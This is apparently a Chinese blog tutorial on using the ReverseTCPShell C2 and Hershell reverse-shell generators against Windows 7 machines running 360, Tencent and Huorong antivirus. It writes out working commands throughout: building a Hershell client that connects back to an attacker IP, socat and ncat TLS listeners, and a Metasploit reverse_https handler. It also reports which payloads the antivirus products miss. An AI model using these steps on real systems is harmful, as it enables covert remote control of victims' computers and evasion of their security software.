ReverseTCPShell C2&&Hershell-两个反向shell生成器

事情起因

使用的是前面文章nps_payload的三件套环境，配置如下：

Win7 SP1 build 7601
windows 防火墙打开
360 杀毒正式版 5.0.0.8170
腾讯电脑管家 13.3.20238.213
火绒 5.0.36.16

ReverseTCPShell C2

首先从github 地址下载ReverseTCP.ps1文件并使用powershell打开

设置LHOST和LPORT，会让你选择加密方式，默认有三种

ASCII
xor
Base64

我这里选择了xor

自动生成了ps和cmd下的利用代码，并且开始监听LPORT

我们复制cmd代码到win7上，成功免杀三件套获得shell

可以执行简单的命令ls,whoami,upload,download,screenshot

虽然执行的命令少，但至少目前是三件套免杀的，可以获取到shell后上传免杀渗透工具继续渗透。

Hershell

Hershell 是一款 go 语言编写的多平台反向 shell 生成器，使用 tls 加密流量，并提供证书公钥指纹固定功能，防止流量拦截。

这个工具需要go环境，如果已经安装的可以跳过这部分

go 环境

首先打开go环境下载的中文官网，获取最新linux版本的go下载链接：

wget https://studygolang.com/dl/golang/go1.13.7.linux-amd64.tar.gz
sudo tar -xzf go1.13.7.linux-amd64.tar.gz -C /usr/local/
export GOROOT=/usr/local/go
export GOBIN=$GOROOT/bin
export PATH=$PATH:$GOBIN
export GOPATH=$HOME/gopath (可选设置)
go version查看是否安装成功

使用

拉取：

go get github.com/lesnuages/hershell

首先生成一个证书：

cd hershell
make depends

以 windows 为例，生成一个客户端，其他平台同理：

make windows64 LHOST=192.168.1.18 LPORT=3333

得到的hershell.exe拷贝到目标主机上，实测360杀毒能够查杀，火绒和腾讯没问题

然后可以使用如下程序开始监听：

socat
ncat
openssl server module
metasploit multi handler（python/shell_reverse_tcp_ssl payload）

我个人推荐使用socat，命令如下：

socat openssl-listen:3333,reuseaddr,cert=server.pem,cafile=server.key system:bash,pty,stderr

但我运行一直报错：

只能使用ncat了，这个ncat可不是那个netcat的nc

安装nmap即可使用，监听命令为：

ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 3333

虚拟机上打开hershell.exe，ubuntu上即可接收到shell:

与 msf 互传

支持 msf 以下的 payload：

windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
windows/x64/meterpreter/reverse_http
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https

那这里就选择 64 位的带ssl的windows/x64/meterpreter/reverse_https吧

先把hershell生成的server.pem文件拷贝在msf所在主机上，然后msf开启监听：

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
setg LHOST 192.168.1.2
setg LPORT 3333
set HandlerSSLCert /root/server.pem
exploit -j -z

这里的ip和端口都是msf所在主机上的，可以随便设置

然后 hershell 进行同传：

[hershell]> meterpreter https 192.168.1.2:3333

实测没有接收成功

参考文章：

本文完。

ReverseTCPShell C2&amp;&amp;Hershell-两个反向shell生成器

事情起因#

ReverseTCPShell C2#

Hershell#

go 环境#

使用#

与 msf 互传#